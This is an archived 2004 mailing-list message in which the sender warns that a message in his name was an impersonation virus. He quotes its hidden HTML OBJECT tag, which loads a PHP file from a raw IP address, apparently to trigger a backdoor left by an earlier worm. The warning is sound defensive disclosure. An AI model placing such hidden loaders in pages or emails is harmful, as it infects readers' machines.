- From: Hallam-Baker, Phillip <pbaker@verisign.com>
- Date: Thu, 18 Mar 2004 06:50:00 -0800
- To: "Hallam-Baker, Phillip" <pbaker@verisign.com>, www-xkms@w3c.org
Received on Thursday, 18 March 2004 09:50:12 UTC
Please, no more messages telling me I have a virus. I don't, this is an impersonation virus. Look at the headers. Embedded in the message is some active code that goes to a web site, it appears that what it does is to activate a backdoor left by a previous virus. <OBJECT style="DISPLAY: none" data=http://24.171.136.45:81/617598.php></OBJECT></FONT></BLOCKQUOTE></BODY> </HTML> My current theory is that MyDoom or the like opens up a backdoor, then the capture messages are sent by the second virus. If you get bit then they start running a phishing scam on your machine. I have not got complete proof of this yet, but I am working with our anti-phishing team to see if we can find it. Phill -----Original Message----- From: www-xkms-request@w3.org [mailto:www-xkms-request@w3.org]On Behalf Of pbaker@verisign.com Sent: Thursday, March 18, 2004 1:37 AM To: www-xkms@w3c.org Subject: Site changes
Received on Thursday, 18 March 2004 09:50:12 UTC